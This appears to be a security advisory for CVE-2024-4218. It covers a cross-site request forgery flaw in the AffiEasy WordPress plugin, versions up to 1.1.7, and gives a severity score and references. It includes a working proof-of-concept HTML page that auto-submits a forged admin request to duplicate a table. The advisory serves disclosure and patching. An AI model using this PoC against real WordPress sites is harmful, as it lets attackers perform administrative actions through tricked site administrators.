Description

The AffiEasy plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.7. This is due to plugin improperly releasing the tagged and patched version of the plugin - the vulnerable version is used as the core files, while the patched version was included in a ‘trunk’ folder. This makes it possible for unauthenticated attackers to perform a variety of actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

Severity

6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Affected Version

<= 1.1.7

PoC :

<html>
  <!-- Made by eneriiiii<3 / https://x.com/aaillesim -->
  <body>
    <form action="http://[ASSETS]/wp-admin/admin.php">
      <input type="hidden" name="page" value="affieasy&#45;table" />
      <input type="hidden" name="action" value="duplicate&#45;table" />
      <input type="hidden" name="id" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Reference

  • https://plugins.trac.wordpress.org/browser/affieasy/tags/1.1.6
  • https://www.cve.org/CVERecord?id=CVE-2024-4218
  • https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/affieasy/affieasy-117-cross-site-request-forgery-to-various-actions